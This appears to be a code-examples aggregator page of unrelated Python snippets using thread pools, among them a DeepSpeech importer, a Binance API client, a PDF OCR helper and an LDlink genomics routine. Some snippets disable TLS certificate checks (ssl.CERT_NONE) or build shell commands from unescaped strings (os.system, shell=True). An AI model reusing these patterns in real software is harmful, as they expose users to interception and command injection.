    #small = [25, 27, 14, 3, 2, 556, 8, 20, 31, 7, 21, 4, 24, 28, 5, 32, 30, 33, 29, 561, 560, 34]

    
    try:
        from info import link, cat, large, small
        print 'imported data from info'
    except:
        print 'lack of info.py'
        exit(0)    



    swim = []

    for i in small:
        swim.append((link, i, 0))

    for p in large:
        for c in cat:
            swim.append((link, p, c))
    
    
    
    
    
    
    
    print "combinations: "+str(len(swim))
    start=time()

    pool = ThreadPool(cpu)
    
    results = pool.map(helper, swim)
    pool.close()
    pool.join()
    
    end = time()
    elapse = end - start 
    print 'used {:.2f} s, {:.2f} mins'.format(elapse, elapse/60)
    
    print 'start concating data'
    
    ct = ctime().split()
    path = ct[2]+ct[1]+ct[-1]+'_product/'
    
    files = os.listdir(path)
    len(files)
    df = pd.concat([pd.read_excel(path + i) for i in files])
    print df.shape
    print 'removing duplicates'
    
    col = list(df.columns)
    col = [col.pop(col.index('pid')), col.pop(col.index('title'))]+col
    df = df[col]
    df = df.reset_index(drop=True)
    
    df = df.loc[df['pid'].drop_duplicates().index,:]
    print df.shape
    print 'saving to products.xlsx'
    
    df.to_excel(strftime("%Y-%m-%d-%H-%M",localtime())+ ' Products.xlsx', encoding='utf-8', index=False)
    print 'done!', ctime()
コード例 #51
0
ファイル: import_cv2.py プロジェクト: zh4r0nax/DeepSpeech
def _maybe_convert_set(input_tsv,
                       audio_dir,
                       label_filter,
                       space_after_every_character=None):
    output_csv = path.join(audio_dir,
                           os.path.split(input_tsv)[-1].replace('tsv', 'csv'))
    print("Saving new DeepSpeech-formatted CSV file to: ", output_csv)

    # Get audiofile path and transcript for each sentence in tsv
    samples = []
    with open(input_tsv, encoding='utf-8') as input_tsv_file:
        reader = csv.DictReader(input_tsv_file, delimiter='\t')
        for row in reader:
            samples.append((row['path'], row['sentence']))

    # Keep track of how many samples are good vs. problematic
    counter = {
        'all': 0,
        'failed': 0,
        'invalid_label': 0,
        'too_short': 0,
        'too_long': 0,
        'total_time': 0
    }
    lock = RLock()
    num_samples = len(samples)
    rows = []

    def one_sample(sample):
        """ Take a audio file, and optionally convert it to 16kHz WAV """
        mp3_filename = path.join(audio_dir, sample[0])
        if not path.splitext(mp3_filename.lower())[1] == '.mp3':
            mp3_filename += ".mp3"
        # Storing wav files next to the mp3 ones - just with a different suffix
        wav_filename = path.splitext(mp3_filename)[0] + ".wav"
        _maybe_convert_wav(mp3_filename, wav_filename)
        file_size = -1
        frames = 0
        if path.exists(wav_filename):
            file_size = path.getsize(wav_filename)
            frames = int(
                subprocess.check_output(['soxi', '-s', wav_filename],
                                        stderr=subprocess.STDOUT))
        label = label_filter(sample[1])
        with lock:
            if file_size == -1:
                # Excluding samples that failed upon conversion
                counter['failed'] += 1
            elif label is None:
                # Excluding samples that failed on label validation
                counter['invalid_label'] += 1
            elif int(frames / SAMPLE_RATE * 1000 / 10 / 2) < len(str(label)):
                # Excluding samples that are too short to fit the transcript
                counter['too_short'] += 1
            elif frames / SAMPLE_RATE > MAX_SECS:
                # Excluding very long samples to keep a reasonable batch-size
                counter['too_long'] += 1
            else:
                # This one is good - keep it for the target CSV
                rows.append(
                    (os.path.split(wav_filename)[-1], file_size, label))
            counter['all'] += 1
            counter['total_time'] += frames

    print("Importing mp3 files...")
    pool = Pool(cpu_count())
    bar = progressbar.ProgressBar(max_value=num_samples, widgets=SIMPLE_BAR)
    for i, _ in enumerate(pool.imap_unordered(one_sample, samples), start=1):
        bar.update(i)
    bar.update(num_samples)
    pool.close()
    pool.join()

    with open(output_csv, 'w', encoding='utf-8') as output_csv_file:
        print('Writing CSV file for DeepSpeech.py as: ', output_csv)
        writer = csv.DictWriter(output_csv_file, fieldnames=FIELDNAMES)
        writer.writeheader()
        bar = progressbar.ProgressBar(max_value=len(rows), widgets=SIMPLE_BAR)
        for filename, file_size, transcript in bar(rows):
            if space_after_every_character:
                writer.writerow({
                    'wav_filename': filename,
                    'wav_filesize': file_size,
                    'transcript': ' '.join(transcript)
                })
            else:
                writer.writerow({
                    'wav_filename': filename,
                    'wav_filesize': file_size,
                    'transcript': transcript
                })

    print('Imported %d samples.' %
          (counter['all'] - counter['failed'] - counter['too_short'] -
           counter['too_long']))
    if counter['failed'] > 0:
        print('Skipped %d samples that failed upon conversion.' %
              counter['failed'])
    if counter['invalid_label'] > 0:
        print('Skipped %d samples that failed on transcript validation.' %
              counter['invalid_label'])
    if counter['too_short'] > 0:
        print(
            'Skipped %d samples that were too short to match the transcript.' %
            counter['too_short'])
    if counter['too_long'] > 0:
        print('Skipped %d samples that were longer than %d seconds.' %
              (counter['too_long'], MAX_SECS))
    print('Final amount of imported audio: %s.' %
          secs_to_hours(counter['total_time'] / SAMPLE_RATE))
コード例 #52
0
ファイル: getdata.py プロジェクト: fswzb/QUANTAXIS-1
def _thread(hs, cs, n):
    pool = Pool(n)
    ret = pool.map(hs, cs)
    pool.close()
    pool.join()
    return ret
コード例 #53
0
ファイル: searchLAADS.py プロジェクト: BENR0/searchLAADs
    def downloadFiles(self, directory = None, maxRetries = 5, multiproc = False, numproc = 3, overwrite = False):
        """Download URLs.

        TODO
        ----
        - overwrite parameter: to be able to skip or overwrite existing files
        - write urls of failed downloads to file?

        Parameters
        ----------
        directory: str
            Base directory where to save files
        maxRetries: int
            Maximum number of retrys to open the url
        multiproc: boolean
            Download multiple files at the same time.
        numproc: int optional
            Number of processes if multiproc is set to True
        overwrite: boolean
            Should existing files be overwritten?

        
        Return
        ------
        """
        directory = self.targetDir

        def pathTuple(url, directory = directory):
            secfield = os.path.basename(url).split(".")[1]
            year = secfield[1:5]
            outdir = os.path.join(directory, year)
            return((url, outdir))

        def download(itemtuple):
            #unpack tuple
            url = itemtuple[0]
            directory = itemtuple[1]

            fname = os.path.basename(url)
            fpath = os.path.join(directory, fname)


            attempts = 0
	    if not os.path.isfile(fpath):
                while attempts < maxRetries:
                    try:
                        response = urllib2.urlopen(url)
		        with open(fpath, "wb") as f:
		 	    f.write(response.read())

                        break
                    except urllib2.URLError as e:
                        logger.debug(e)
                        logger.debug("File {0} failed to download with the above error".format(url))
                        if attempts == maxRetries -1:
                            with open("download_failed.txt", "w") as f:
                                f.write(url + "\n")

                        attempts += 1
                        pass

            #update progressbar
            pbar.update(1)

            return


        try:
            if directory is not None:
                self.pathList = list(map(pathTuple, self.fileURLs))
            else:
                raise TypeError
        except TypeError:
            print("""No target directory were to store files given. Instantiate search obejct with 
                    directory or set the directory parameter of downloadFiles.""")
        
        #create year directories separate to avoid race condition when
        #using it in the download function itself and multiprocessing enabled
        for d in set([x[1] for x in self.pathList]):
            #check if fpath exists. create if necessary 
            if not os.path.exists(d):
                os.makedirs(d)

        msg = "Starting download of files..."
        logger.info(msg)
        #print(msg)

        pbar = tqdm(total = len(self.pathList))

        if multiproc:
            p = Pool(numproc)
            p.map(download, self.pathList)
            p.close()
            p.join()
        else:
            map(download, self.pathList)
        
        pbar.close()


        #check if file was downloaded correctly else download again

        pass
コード例 #54
0
def get_all(codes, f):
    print type(codes)
    pool = ThreadPool(40)
    pool.map(f, codes)
    pool.close()
    pool.join()
コード例 #55
0
ファイル: avtag.py プロジェクト: xinlawliet/bilibili-data
'''遍历稿件tag'''
#!/usr/bin/python
# -*- coding: utf-8 -*-

from multiprocessing.dummy import Pool as ThreadPool
from bilisupport import AVTAGLIST, ERRORLIST, API_TAG
import requests


def gettag(aid):
    '''获取稿件tag'''
    if not aid:
        return 404
    aid = int(aid)
    aidparams = {'aid': aid, 'jsonp': 'jsonp'}
    info = requests.get(url=API_TAG, params=aidparams).json()
    if info.get('code') == 0:
        tags = [{'aid': aid, 'tag': x.get('tag_id')} for x in info.get('data')]
        AVTAGLIST.insert_many(tags)
        print(aid)
    else:
        ERRORLIST.insert_one(info)


if __name__ == '__main__':
    MULTIPOOL = ThreadPool(8)
    for avid in open('videoaid.csv', 'r'):
        MULTIPOOL.apply_async(gettag, (avid, ))
    MULTIPOOL.close()
    MULTIPOOL.join()
コード例 #56
0
class BinanceApi(object):
    """"""

    ###################################################
    ## Basic Function
    ###################################################

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.apiKey = ''
        self.secretKey = ''

        self.active = False
        self.reqid = 0
        self.queue = Queue()
        self.pool = None

        self.headers = {}
        self.secret = ''
        self.recvWindow = 5000

        self.dataStreamNameList = []
        self.dataStreamUrl = ''
        self.dataStreamActive = False
        self.dataStreamWs = None
        self.dataStreamThread = None

        self.userStreamKey = ''
        self.userStreamUrl = ''
        self.userStreamActive = False
        self.userStreamWs = None
        self.userStreamThread = None

        self.keepaliveCount = 0
        self.keepaliveThread = None

    #----------------------------------------------------------------------
    def init(self, apiKey, secretKey, recvWindow=5000):
        """"""
        self.apiKey = apiKey
        self.secretKey = secretKey

        self.headers['X-MBX-APIKEY'] = apiKey
        self.secret = bytes(secretKey.encode('utf-8'))
        self.recvWindow = recvWindow

    #----------------------------------------------------------------------
    def start(self, n=10):
        """"""
        if self.active:
            return

        self.active = True

        self.pool = Pool(n)
        self.pool.map_async(self.run, range(n))

    #----------------------------------------------------------------------
    def close(self):
        """"""
        self.active = False

        if self.pool:
            self.pool.close()
            self.pool.join()

    #----------------------------------------------------------------------
    def request(self, method, path, params=None, signed=False, stream=False):
        """"""
        if not signed:
            url = REST_ENDPOINT + path
            headers = {}
        else:
            if not stream:
                params['recvWindow'] = self.recvWindow
                params['timestamp'] = int(time() * 1000)
                query = parse.urlencode(sorted(params.items()))

                signature = hmac.new(self.secret, query.encode('utf-8'),
                                     hashlib.sha256).hexdigest()
                query += "&signature={}".format(signature)

                url = REST_ENDPOINT + path + '?' + query
                params = None  # 参数添加到query中后,清空参数字典
            else:
                if params:
                    query = parse.urlencode(sorted(params.items()))
                    url = REST_ENDPOINT + path + '?' + query
                    params = None
                else:
                    url = REST_ENDPOINT + path

            headers = self.headers

        try:
            resp = requests.request(method,
                                    url,
                                    params=params,
                                    headers=headers)

            if resp.status_code == 200:
                return True, resp.json()
            else:
                error = {
                    'method': method,
                    'params': params,
                    'code': resp.status_code,
                    'msg': resp.json()['msg']
                }
                return False, error
        except Exception as e:
            error = {
                'method': method,
                'params': params,
                'code': e,
                'msg': traceback.format_exc()
            }
            return False, error

    #----------------------------------------------------------------------
    def addReq(self,
               method,
               path,
               params,
               callback,
               signed=False,
               stream=False):
        """添加请求"""
        self.reqid += 1
        req = (method, path, params, callback, signed, stream, self.reqid)
        self.queue.put(req)
        return self.reqid

    #----------------------------------------------------------------------
    def processReq(self, req):
        """"""
        method, path, params, callback, signed, stream, reqid = req
        result, data = self.request(method, path, params, signed, stream)

        if result:
            callback(data, reqid)
        else:
            self.onError(data, reqid)

    #----------------------------------------------------------------------
    def run(self, n):
        """"""
        while self.active:
            try:
                req = self.queue.get(timeout=1)
                self.processReq(req)
            except Empty:
                pass

    ###################################################
    ## REST Function
    ###################################################

    #----------------------------------------------------------------------
    def queryPing(self):
        """"""
        path = '/api/v1/ping'
        return self.addReq('GET', path, {}, self.onQueryPing)

    #----------------------------------------------------------------------
    def queryTime(self):
        """"""
        path = '/api/v1/time'
        return self.addReq('GET', path, {}, self.onQueryTime)

    #----------------------------------------------------------------------
    def queryExchangeInfo(self):
        """"""
        path = '/api/v1/exchangeInfo'
        return self.addReq('GET', path, {}, self.onQueryExchangeInfo)

    #----------------------------------------------------------------------
    def queryDepth(self, symbol, limit=0):
        """"""
        path = '/api/v1/depth'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        return self.addReq('GET', path, params, self.onQueryDepth)

    #----------------------------------------------------------------------
    def queryTrades(self, symbol, limit=0):
        """"""
        path = '/api/v1/trades'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        return self.addReq('GET', path, params, self.onQueryTrades)

    #----------------------------------------------------------------------
    def queryAggTrades(self,
                       symbol,
                       fromId=0,
                       startTime=0,
                       endTime=0,
                       limit=0):
        """"""
        path = '/api/v1/aggTrades'

        params = {'symbol': symbol}
        if fromId:
            params['fromId'] = fromId
        if startTime:
            params['startTime'] = startTime
        if endTime:
            params['endTime'] = endTime
        if limit:
            params['limit'] = limit

        return self.addReq('GET', path, params, self.onQueryAggTrades)

    #----------------------------------------------------------------------
    def queryKlines(self, symbol, interval, limit=0, startTime=0, endTime=0):
        """"""
        path = '/api/v1/klines'

        params = {'symbol': symbol, 'interval': interval}
        if limit:
            params['limit'] = limit
        if startTime:
            params['startTime'] = startTime
        if endTime:
            params['endTime'] = endTime

        return self.addReq('GET', path, params, self.onQueryKlines)

    #----------------------------------------------------------------------
    def queryTicker24HR(self, symbol=''):
        """"""
        path = '/api/v1/ticker/24hr'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryTicker24HR)

    #----------------------------------------------------------------------
    def queryTickerPrice(self, symbol=''):
        """"""
        path = '/api/v3/ticker/price'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryTickerPrice)

    #----------------------------------------------------------------------
    def queryBookTicker(self, symbol=''):
        """"""
        path = '/api/v3/ticker/bookTicker'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryBookTicker)

    #----------------------------------------------------------------------
    def newOrder(self,
                 symbol,
                 side,
                 type_,
                 price,
                 quantity,
                 timeInForce,
                 newClientOrderId='',
                 stopPrice=0,
                 icebergQty=0,
                 newOrderRespType=''):
        """"""
        path = '/api/v3/order'

        params = {
            'symbol': symbol,
            'side': side,
            'type': type_,
            'price': price,
            'quantity': quantity,
            'timeInForce': timeInForce
        }
        if newClientOrderId:
            params['newClientOrderId'] = newClientOrderId
        if timeInForce:
            params['timeInForce'] = timeInForce
        if stopPrice:
            params['stopPrice'] = stopPrice
        if icebergQty:
            params['icebergQty'] = icebergQty
        if newOrderRespType:
            params['newOrderRespType'] = newOrderRespType

        return self.addReq('POST', path, params, self.onNewOrder, signed=True)

    #----------------------------------------------------------------------
    def queryOrder(self, symbol, orderId=0, origClientOrderId=0):
        """"""
        path = '/api/v3/order'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if origClientOrderId:
            params['origClientOrderId'] = origClientOrderId
        return self.addReq('GET', path, params, self.onQueryOrder, signed=True)

    #----------------------------------------------------------------------
    def cancelOrder(self,
                    symbol,
                    orderId=0,
                    origClientOrderId='',
                    newClientOrderId=''):
        """"""
        path = '/api/v3/order'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if origClientOrderId:
            params['origClientOrderId'] = origClientOrderId
        if newClientOrderId:
            params['newClientOrderId'] = newClientOrderId
        return self.addReq('DELETE',
                           path,
                           params,
                           self.onCancelOrder,
                           signed=True)

    #----------------------------------------------------------------------
    def queryOpenOrders(self, symbol=''):
        """"""
        path = '/api/v3/openOrders'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryOpenOrders,
                           signed=True)

    #----------------------------------------------------------------------
    def queryAllOrders(self, symbol, orderId=0, limit=0):
        """"""
        path = '/api/v3/allOrders'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if limit:
            params['limit'] = limit
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryAllOrders,
                           signed=True)

    #----------------------------------------------------------------------
    def queryAccount(self):
        """"""
        path = '/api/v3/account'
        params = {}
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryAccount,
                           signed=True)

    #----------------------------------------------------------------------
    def queryMyTrades(self, symbol, limit=0, fromId=0):
        """"""
        path = '/api/v3/myTrades'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        if fromId:
            params['fromId'] = fromId
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryMyTrades,
                           signed=True)

    #----------------------------------------------------------------------
    def startStream(self):
        """"""
        path = '/api/v1/userDataStream'
        return self.addReq('POST',
                           path, {},
                           self.onStartStream,
                           signed=True,
                           stream=True)

    #----------------------------------------------------------------------
    def keepaliveStream(self, listenKey):
        """"""
        path = '/api/v1/userDataStream'
        params = {'listenKey': listenKey}
        return self.addReq('PUT',
                           path,
                           params,
                           self.onKeepaliveStream,
                           signed=True,
                           stream=True)

    #----------------------------------------------------------------------
    def closeStream(self, listenKey):
        """"""
        path = '/api/v1/userDataStream'
        params = {'listenKey': listenKey}
        return self.addReq('DELETE',
                           path,
                           params,
                           self.onCloseStream,
                           signed=True,
                           stream=True)

    ###################################################
    ## REST Callback
    ###################################################

    #----------------------------------------------------------------------
    def onError(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryPing(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTime(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryExchangeInfo(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryDepth(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTrades(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryAggTrades(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryKlines(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTicker24HR(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTickerPrice(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryBookTicker(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onNewOrder(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryOrder(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onCancelOrder(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryOpenOrders(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryAllOrders(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryAccount(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryMyTrades(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onStartStream(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onKeepaliveStream(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onCloseStream(self, data, reqid):
        """"""
        print((data, reqid))

    ###################################################
    ## Websocket Function
    ###################################################

    #----------------------------------------------------------------------
    def initDataStream(self, nameList=None):
        """"""
        if nameList:
            self.dataStreamNameList = nameList
        s = '/'.join(self.dataStreamNameList)
        self.dataStreamUrl = DATASTREAM_ENDPOINT + s

        result = self.connectDataStream()
        if result:
            self.dataStreamActive = True
            self.dataStreamThread = Thread(target=self.runDataStream)
            self.dataStreamThread.start()

    #----------------------------------------------------------------------
    def runDataStream(self):
        """"""
        while self.dataStreamActive:
            try:
                stream = self.dataStreamWs.recv()
                data = json.loads(stream)
                self.onMarketData(data)
            except:
                self.onDataStreamError('Data stream connection lost')
                result = self.connectDataStream()
                if not result:
                    self.onDataStreamError(u'Waiting 3 seconds to reconnect')
                    sleep(3)
                else:
                    self.onDataStreamError(u'Data stream reconnected')

    #----------------------------------------------------------------------
    def closeDataStream(self):
        """"""
        self.dataStreamActive = False
        self.dataStreamThread.join()

    #----------------------------------------------------------------------
    def connectDataStream(self):
        """"""
        try:
            self.dataStreamWs = create_connection(
                self.dataStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE})
            return True
        except:
            msg = traceback.format_exc()
            self.onDataStreamError('Connecting data stream falied: %s' % msg)
            return False

    #----------------------------------------------------------------------
    def onDataStreamError(self, msg):
        """"""
        print(msg)

    #----------------------------------------------------------------------
    def onMarketData(self, data):
        """"""
        print(data)

    #----------------------------------------------------------------------
    def initUserStream(self, key):
        """"""
        self.userStreamKey = key
        self.userStreamUrl = USERSTREAM_ENDPOINT + key

        result = self.connectUserStream()
        if result:
            self.userStreamActive = True
            self.userStreamThread = Thread(target=self.runUserStream)
            self.userStreamThread.start()

            self.keepaliveThread = Thread(target=self.runKeepalive)
            self.keepaliveThread.start()

    #----------------------------------------------------------------------
    def runUserStream(self):
        """"""
        while self.userStreamActive:
            try:
                stream = self.userStreamWs.recv()
                data = json.loads(stream)
                self.onUserData(data)
            except:
                self.onUserStreamError('User stream connection lost')
                result = self.connectUserStream()
                if not result:
                    self.onUserStreamError(u'Waiting 3 seconds to reconnect')
                    sleep(3)
                else:
                    self.onUserStreamError(u'User stream reconnected')

    #----------------------------------------------------------------------
    def closeUserStream(self):
        """"""
        self.userStreamActive = False
        self.userStreamThread.join()
        self.keepaliveThread.join()

    #----------------------------------------------------------------------
    def connectUserStream(self):
        """"""
        try:
            self.userStreamWs = create_connection(
                self.userStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE})
            return True
        except:
            msg = traceback.format_exc()
            self.onUserStreamError('Connecting user stream falied: %s' % msg)
            return False

    #----------------------------------------------------------------------
    def onUserStreamError(self, msg):
        """"""
        print(msg)

    #----------------------------------------------------------------------
    def onUserData(self, data):
        """"""
        print(data)

    #----------------------------------------------------------------------
    def runKeepalive(self):
        """"""
        while self.userStreamActive:
            self.keepaliveCount += 1

            if self.keepaliveCount >= 1800:
                self.keepaliveCount = 0
                self.keepaliveStream(self.userStreamKey)

            sleep(1)
コード例 #57
0
ファイル: pdf_to_html.py プロジェクト: vasim07/hackathons
    def multithread_processor(self,
                              to_pdf=False,
                              to_text=False,
                              gen_images=False):
        def image_to_pdf(image_paths):
            for image_path in image_paths:
                print(image_path)
                if self.pdf_type == 'image':
                    filename = '%s/%s-%s_1' % (
                        self.images_folder, self.filename,
                        image_path.split('.')[-2].split('-')[-1])
                else:
                    filename = image_path.split('.png')[0]
                print(filename)
                os.system('tesseract --oem 1 -l eng --psm 6 %s %s pdf' %
                          (image_path, filename))
            return 0

        def image_to_text(image_paths):
            for image_path in image_paths:
                print(image_path)
                filename = '%s/%s' % (self.images_folder,
                                      image_path.split('.')[0])
                print(filename)
                os.system('tesseract --oem 1 -l eng --psm 6 %s %s' %
                          (image_path, filename))
            return 0

        def generate_images(pages_list):
            for p_num in pages_list:
                print('Generating images %s' % p_num)
                convert_from_path(self.file_path,
                                  dpi=self.generate_images_dpi,
                                  output_folder=self.images_folder,
                                  first_page=p_num,
                                  last_page=p_num,
                                  fmt='png')
                print('Generating images completed %s' % p_num)
            return 0

        if to_pdf:
            paths = glob.glob('%s/*.png' % self.images_folder)
            print(paths)

            def multi_run_wrapper(args):
                return image_to_pdf(*args)

        elif to_text:
            paths = glob.glob('%s/*.png' % self.images_folder)

            def multi_run_wrapper(args):
                return image_to_text(*args)

        elif gen_images:
            paths = list(range(1, self.pages + 1))  # pages_list

            def multi_run_wrapper(args):
                return generate_images(*args)

        def divide_range(seq, num):
            avg = len(seq) / float(num)
            out = list()
            last = 0.0
            while last < len(seq):
                out.append([int(last), int(last + avg)])
                last += avg
            return out

        arg_data = list()

        for n in divide_range(range(len(paths)), self.pool_size):
            final_list = paths[n[0]:n[1]]
            arg_data.append([final_list])

        pool = Pool(self.pool_size)
        response_data = pool.map(multi_run_wrapper, arg_data)
        pool.close()
        pool.join()
        print('Done multiprocessing')
コード例 #58
0
def calculate_express(snplst,
                      pop,
                      request,
                      web,
                      tissues,
                      r2_d,
                      genome_build,
                      r2_d_threshold=0.1,
                      p_threshold=0.1,
                      window=500000):
    print("##### START LD EXPRESS CALCULATION #####")
    print("raw snplst", snplst)
    print("raw pop", pop)
    print("raw request", request)
    print("raw web", web)
    print("raw tissues", tissues)
    print("raw r2_d", r2_d)
    print("raw r2_d_threshold", r2_d_threshold)
    print("raw p_threshold", p_threshold)
    print("raw window", window)
    print("raw genome_build", genome_build)

    full_start = timer()

    # SNP limit
    max_list = 10

    # Ensure tmp directory exists
    if not os.path.exists(tmp_dir):
        os.makedirs(tmp_dir)

    errors_warnings = {}

    # Validate genome build param
    if genome_build not in genome_build_vars['vars']:
        errors_warnings[
            "error"] = "Invalid genome build. Please specify either " + ", ".join(
                genome_build_vars['vars']) + "."
        return ("", "", "", "", "", errors_warnings)

    # Validate window size is between 0 and 1,000,000
    if window < 0 or window > 1000000:
        errors_warnings[
            "error"] = "Window value must be a number between 0 and 1,000,000."
        return ("", "", "", "", "", errors_warnings)

    # Parse SNPs list
    snps_raw = snplst.split("+")
    # Generate error if # of inputted SNPs exceeds limit
    if len(snps_raw) > max_list:
        errors_warnings["error"] = "Maximum SNP list is " + \
            str(max_list)+" RS numbers. Your list contains " + \
            str(len(snps_raw))+" entries."
        return ("", "", "", "", "", errors_warnings)
    # Remove duplicate RS numbers
    sanitized_query_snps = []
    for snp_raw in snps_raw:
        snp = snp_raw.strip()
        if snp not in sanitized_query_snps:
            sanitized_query_snps.append([snp])

    # Connect to Mongo database
    if env == 'local':
        mongo_host = api_mongo_addr
    else:
        mongo_host = 'localhost'
    if web:
        client = MongoClient(
            'mongodb://' + mongo_username + ':' + mongo_password + '@' +
            mongo_host + '/admin', mongo_port)
    else:
        if env == 'local':
            client = MongoClient(
                'mongodb://' + mongo_username + ':' + mongo_password + '@' +
                mongo_host + '/admin', mongo_port)
        else:
            client = MongoClient('localhost', mongo_port)
    db = client["LDLink"]
    # Check if dbsnp collection in MongoDB exists, if not, display error
    if "dbsnp" not in db.list_collection_names():
        errors_warnings[
            "error"] = "dbSNP is currently unavailable. Please contact support."
        return ("", "", "", "", "", errors_warnings)

    # Select desired ancestral populations
    pops = pop.split("+")
    pop_dirs = []
    for pop_i in pops:
        if pop_i in [
                "ALL", "AFR", "AMR", "EAS", "EUR", "SAS", "ACB", "ASW", "BEB",
                "CDX", "CEU", "CHB", "CHS", "CLM", "ESN", "FIN", "GBR", "GIH",
                "GWD", "IBS", "ITU", "JPT", "KHV", "LWK", "MSL", "MXL", "PEL",
                "PJL", "PUR", "STU", "TSI", "YRI"
        ]:
            pop_dirs.append(data_dir + population_samples_dir + pop_i + ".txt")
        else:
            errors_warnings[
                "error"] = pop_i + " is not an ancestral population. Choose one of the following ancestral populations: AFR, AMR, EAS, EUR, or SAS; or one of the following sub-populations: ACB, ASW, BEB, CDX, CEU, CHB, CHS, CLM, ESN, FIN, GBR, GIH, GWD, IBS, ITU, JPT, KHV, LWK, MSL, MXL, PEL, PJL, PUR, STU, TSI, or YRI."
            return ("", "", "", "", "", errors_warnings)

    # get_pops = "cat " + " ".join(pop_dirs)
    # proc = subprocess.Popen(get_pops, shell=True, stdout=subprocess.PIPE)
    # pop_list = [x.decode('utf-8') for x in proc.stdout.readlines()]

    get_pops = "cat " + " ".join(
        pop_dirs) + " > " + tmp_dir + "pops_" + request + ".txt"
    subprocess.call(get_pops, shell=True)

    pop_list = open(tmp_dir + "pops_" + request + ".txt").readlines()

    ids = [i.strip() for i in pop_list]
    pop_ids = list(set(ids))

    # tissue_ids = tissue.split("+")
    # print("tissue_ids", tissue_ids)

    # Get rs number from genomic coordinates from dbsnp
    def get_rsnum(db, coord):
        temp_coord = coord.strip("chr").split(":")
        chro = temp_coord[0]
        pos = temp_coord[1]
        query_results = db.dbsnp.find({
            "chromosome":
            str(chro),
            genome_build_vars[genome_build]['position']:
            str(pos)
        })
        query_results_sanitized = json.loads(json_util.dumps(query_results))
        return query_results_sanitized

    # Replace input genomic coordinates with variant ids (rsids)
    def replace_coords_rsid(db, snp_lst):
        new_snp_lst = []
        for snp_raw_i in snp_lst:
            if snp_raw_i[0][0:2] == "rs":
                new_snp_lst.append(snp_raw_i)
            else:
                snp_info_lst = get_rsnum(db, snp_raw_i[0])
                if snp_info_lst != None:
                    if len(snp_info_lst) > 1:
                        var_id = "rs" + snp_info_lst[0]['id']
                        ref_variants = []
                        for snp_info in snp_info_lst:
                            if snp_info['id'] == snp_info['ref_id']:
                                ref_variants.append(snp_info['id'])
                        if len(ref_variants) > 1:
                            var_id = "rs" + ref_variants[0]
                            if "warning" in errors_warnings:
                                errors_warnings["warning"] = errors_warnings["warning"] + \
                                    ". Multiple rsIDs (" + ", ".join(["rs" + ref_id for ref_id in ref_variants]) + ") map to genomic coordinates " + snp_raw_i[0]
                            else:
                                errors_warnings[
                                    "warning"] = "Multiple rsIDs (" + ", ".join(
                                        [
                                            "rs" + ref_id
                                            for ref_id in ref_variants
                                        ]
                                    ) + ") map to genomic coordinates " + snp_raw_i[
                                        0]
                        elif len(ref_variants) == 0 and len(snp_info_lst) > 1:
                            var_id = "rs" + snp_info_lst[0]['id']
                            if "warning" in errors_warnings:
                                errors_warnings["warning"] = errors_warnings["warning"] + \
                                    ". Multiple rsIDs (" + ", ".join(["rs" + ref_id for ref_id in ref_variants]) + ") map to genomic coordinates " + snp_raw_i[0]
                            else:
                                errors_warnings[
                                    "warning"] = "Multiple rsIDs (" + ", ".join(
                                        [
                                            "rs" + ref_id
                                            for ref_id in ref_variants
                                        ]
                                    ) + ") map to genomic coordinates " + snp_raw_i[
                                        0]
                        else:
                            var_id = "rs" + ref_variants[0]
                        new_snp_lst.append([var_id])
                    elif len(snp_info_lst) == 1:
                        var_id = "rs" + snp_info_lst[0]['id']
                        new_snp_lst.append([var_id])
                    else:
                        new_snp_lst.append(snp_raw_i)
                else:
                    new_snp_lst.append(snp_raw_i)
        return new_snp_lst

    sanitized_query_snps = replace_coords_rsid(db, sanitized_query_snps)
    print("sanitized_query_snps", sanitized_query_snps)

    # Find genomic coords of query snps in dbsnp
    details = {}
    rs_nums = []
    snp_pos = []
    snp_coords = []
    warn = []
    # windowWarnings = []
    queryWarnings = []
    for snp_i in sanitized_query_snps:
